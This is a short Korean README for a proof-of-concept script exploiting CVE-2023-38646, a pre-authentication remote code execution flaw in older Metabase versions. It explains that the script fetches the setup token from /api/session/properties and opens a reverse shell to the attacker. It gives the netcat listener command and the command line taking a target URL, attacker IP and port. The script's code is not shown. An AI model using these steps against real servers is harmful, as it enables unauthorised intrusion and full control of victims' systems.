
Metabase 사전 인증 RCE PoC
Metabase 오픈 소스 0.46.6.1 이전 버전 및 Metabase Enterprise 1.46.6.1 이전 버전에서 공격자가 서버에서 임의의 명령을 실행할 수 있습니다. 저는 공격자 머신에서 리버스 셸을 획득할 수 있도록 스크립트를 직접 작성했습니다.
스크립트는 대상 URL, 공격자 IP 및 포트를 필요로 합니다. 이 익스플로잇은 스크립트가 /api/session/properties에서 설정 토큰을 얻으려고 시도하므로 설정 토큰을 제공할 필요가 없습니다.
다음 명령을 사용하여 공격자 머신에서 netcat 리스너를 시작해야 합니다:
nc -nlvp {Port}
POC 스크립트를 다음 옵션과 함께 실행하세요:
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
